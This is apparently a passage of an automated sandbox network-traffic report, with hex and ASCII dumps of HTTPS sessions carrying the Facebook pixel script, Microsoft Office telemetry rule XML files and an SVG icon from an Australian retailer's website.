                                                                                                                                    2024-11-05 08:03:21 UTC1671INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                    Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                    2024-11-05 08:03:21 UTC1INData Raw: 2f
                                                                                                                                    Data Ascii: /
                                                                                                                                    2024-11-05 08:03:22 UTC14680INData Raw: 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69 74
                                                                                                                                    Data Ascii: *** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wit
                                                                                                                                    2024-11-05 08:03:22 UTC16384INData Raw: 26 63 21 3d 6e 75 6c 6c 26 26 61 21 3d 6e 75 6c 6c 26 26 64 21 3d 6e 75 6c 6c 3f 7b 64 6f 6d 61 69 6e 5f 75 72 69 3a 62 2c 65 76 65 6e 74 5f 74 79 70 65 3a 63 2c 65 78 74 72 61 63 74 6f 72 5f 74 79 70 65 3a 64 2c 69 64 3a 61 7d 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 67 28 61 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65 63 74 22 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 61 3d 61 2e 65 78 74 72 61 63 74 6f 72 5f 63 6f 6e 66 69 67 3b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65
                                                                                                                                    Data Ascii: &c!=null&&a!=null&&d!=null?{domain_uri:b,event_type:c,extractor_type:d,id:a}:null}function g(a){if(a==null||(typeof a==="undefined"?"undefined":i(a))!=="object")return null;a=a.extractor_config;if(a==null||(typeof a==="undefined"?"undefined":i(a))!=="obje
                                                                                                                                    2024-11-05 08:03:22 UTC16384INData Raw: 72 20 6b 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 6b 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 62 3d 61 2e 54 79 70 65 64 3b 61 2e 63 6f 65 72 63 65 3b 61 2e 65 6e 66 6f 72 63 65 3b 61 3d 62 2e 61 72 72 61 79 4f 66 28 62 2e 6f 62 6a 65 63 74 57 69 74 68 46 69 65 6c 64 73 28 7b 61 6c 6c 6f 63 61 74 69 6f 6e 3a 62 2e 6e 75 6d 62 65 72 28 29 2c 63 6f 64 65 3a 62 2e 73 74 72 69 6e 67 28 29 2c 6e 61 6d 65 3a 62 2e 73 74 72 69 6e 67 28 29 2c 70 61 73 73 52 61 74 65 3a 62 2e 6e 75 6d 62 65 72 28 29 7d 29 29 3b 6b 2e 65 78 70 6f 72 74 73 3d 61 7d 29 28
                                                                                                                                    Data Ascii: r k={exports:{}};k.exports;(function(){"use strict";var a=f.getFbeventsModules("SignalsFBEventsTyped"),b=a.Typed;a.coerce;a.enforce;a=b.arrayOf(b.objectWithFields({allocation:b.number(),code:b.string(),name:b.string(),passRate:b.number()}));k.exports=a})(
                                                                                                                                    2024-11-05 08:03:22 UTC16384INData Raw: 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 64 3d 63 2e 54 79 70 65 64 2c 65 3d 63 2e 63 6f 65 72 63 65 3b 66 75 6e 63 74 69 6f 6e 20 67 28 61 2c 63 2c 66 2c 67 2c 68 29 7b 61 3d 65 28 61 2c 62 29 3b 63 3d 65 28 63 2c 64 2e 73 74 72 69 6e 67 28 29 29 3b 76 61 72 20 6a 3d 7b 7d 3b 66 21 3d 6e 75 6c 6c 26 26 28 74 79 70 65 6f 66 20 66 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 66 29 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 28 6a 3d 66 29 3b 66 3d 67 21 3d 6e 75 6c 6c 26 26 74 79 70 65 6f 66 20 67 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 67 3a 6e 75 6c 6c 3b 67 3d 7b 7d 3b 68 21 3d 6e 75 6c 6c 26 26 28 74 79 70 65 6f 66 20 68 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64
                                                                                                                                    Data Ascii: es("SignalsFBEventsTyped"),d=c.Typed,e=c.coerce;function g(a,c,f,g,h){a=e(a,b);c=e(c,d.string());var j={};f!=null&&(typeof f==="undefined"?"undefined":i(f))==="object"&&(j=f);f=g!=null&&typeof g==="string"?g:null;g={};h!=null&&(typeof h==="undefined"?"und
                                                                                                                                    2024-11-05 08:03:22 UTC1703INData Raw: 6c 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 61 29 7b 76 61 72 20 62 3d 5b 5d 3b 61 3d 6a 5b 61 2e 69 64 5d 7c 7c 7b 7d 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 63 29 26 26 62 2e 70 75 73 68 28 61 5b 63 5d 29 3b 72 65 74 75 72 6e 20 62 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 61 29 7b 72 65 74 75 72 6e 20 6e 28 61 29 2e 6c 65 6e 67 74 68 3e 30 7d 66 75 6e 63 74 69 6f 6e 20 70 28 61 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 61 29 3f 65 5b 61 5d 3a 61 7d 66 75 6e 63 74 69 6f 6e 20 71 28 61 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f
                                                                                                                                    Data Ascii: l}function n(a){var b=[];a=j[a.id]||{};for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&b.push(a[c]);return b}function o(a){return n(a).length>0}function p(a){return Object.prototype.hasOwnProperty.call(e,a)?e[a]:a}function q(a){return Object.pro
                                                                                                                                    2024-11-05 08:03:22 UTC14681INData Raw: 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 69 66 28 74 68 69 73 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 76 61 72 20 66 3d 62 28 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 2c 64 2e 6f 62 6a 65 63 74 28 29 29 3b 69 66 28 66 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 66 3d 6b 28 69 28 6a 28 66 29 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 63 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 2e 6d 61 70 21 3d 6e 75 6c 6c 26 26 61 20 69 6e 20 63 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 2e 6d 61 70 3f 63 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 2e 6d 61 70 5b 61 5d 3a 6e 75 6c 6c 7d 29
                                                                                                                                    Data Ascii: tsResolvedModules==null)return;if(this.moduleEncodings==null)return;var f=b(g.fbq.__fbeventsResolvedModules,d.object());if(f==null)return;f=k(i(j(f),function(a){return c.moduleEncodings.map!=null&&a in c.moduleEncodings.map?c.moduleEncodings.map[a]:null})
                                                                                                                                    2024-11-05 08:03:22 UTC16384INData Raw: 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 50 61 72 61 6d 4c 69 73 74 22 29 2c 68 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 42 65 61 63 6f 6e 22 29 2c 69 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 47 45 54 22 29 2c 6a 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 58 48 52 22 29 3b 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 45 76 65 6e 74 73 22 29 3b 76 61 72 20 6c 3d 62 2e 66 69 72 65 64 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 61 2c 62 29 7b 76
                                                                                                                                    Data Ascii: dules("SignalsParamList"),h=f.getFbeventsModules("signalsFBEventsSendBeacon"),i=f.getFbeventsModules("signalsFBEventsSendGET"),j=f.getFbeventsModules("signalsFBEventsSendXHR");b=f.getFbeventsModules("SignalsFBEventsEvents");var l=b.fired;function m(a,b){v
                                                                                                                                    2024-11-05 08:03:22 UTC16384INData Raw: 61 79 28 61 29 7c 7c 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65 63 74 22 26 26 74 79 70 65 6f 66 20 61 21 3d 3d 22 73 74 72 69 6e 67 22 7c 7c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 7c 7c 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 3d 22 66 75 6e 63 74 69 6f 6e 22
                                                                                                                                    Data Ascii: ay(a)||a==null)throw new g();return a}}function s(){return function(a){if((typeof a==="undefined"?"undefined":i(a))!=="object"&&typeof a!=="string"||Array.isArray(a)||a==null)throw new g();return a}}function t(){return function(a){if(typeof a!=="function"


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    82192.168.2.44985513.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:21 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:21 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 448
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                    ETag: "0x8DC582BB389F49B"
                                                                                                                                    x-ms-request-id: 26055832-201e-0096-545c-2eace6000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080321Z-157b9fd754f8vn5phC1SN10bks000000042g000000006gfy
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:21 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    83192.168.2.44984113.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:21 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:21 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 475
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                    ETag: "0x8DC582BB2BE84FD"
                                                                                                                                    x-ms-request-id: 2676c640-401e-0048-235f-2e0409000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080321Z-157b9fd754fdj9g2hC1SN1a7tn0000000430000000002ywd
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:21 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    84192.168.2.44984613.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:21 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:21 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 491
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                    ETag: "0x8DC582B98B88612"
                                                                                                                                    x-ms-request-id: 2398c3f1-501e-007b-7e8e-2d5ba2000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080321Z-158dbd74bf4jwfhhhC1SN1bnb000000003tg000000003cks
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:21 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    85192.168.2.44985013.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:21 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:21 UTC491INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:21 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 416
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                    ETag: "0x8DC582BAEA4B445"
                                                                                                                                    x-ms-request-id: 1511aab4-801e-0015-535c-2ef97f000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080321Z-158dbd74bf45w8zqhC1SN1xfeg00000003x00000000008sd
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:21 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    86192.168.2.449860162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:21 UTC452OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-cart.svg HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:21 UTC587INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:21 GMT
                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                    last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                    etag: W/"4ca-62599fcdf98c0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    Age: 56967
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210077-DFW
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1730285979.734085,VS0,VS0,VE676
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53ad2e0ce79e-DFW
                                                                                                                                    2024-11-05 08:03:21 UTC782INData Raw: 34 63 61 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 67 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 63 6c 69 70 30 5f 38 34 30 37 5f 31 33 34 37 32 29 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 37 2e 35 20 32 32 2e 35 43 38 2e 33 32 38 34 33 20 32 32 2e 35 20 39 20 32 31 2e 38 32 38 34 20 39 20 32 31 43 39 20 32 30 2e 31 37 31 36 20 38 2e 33 32 38 34 33 20 31 39 2e 35 20 37 2e 35 20 31 39 2e 35 43 36 2e 36 37 31 35 37 20 31 39 2e 35 20 36 20 32 30 2e 31 37 31 36 20 36 20 32 31 43 36 20 32 31 2e 38 32 38
                                                                                                                                    Data Ascii: 4ca<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#clip0_8407_13472)"><path d="M7.5 22.5C8.32843 22.5 9 21.8284 9 21C9 20.1716 8.32843 19.5 7.5 19.5C6.67157 19.5 6 20.1716 6 21C6 21.828
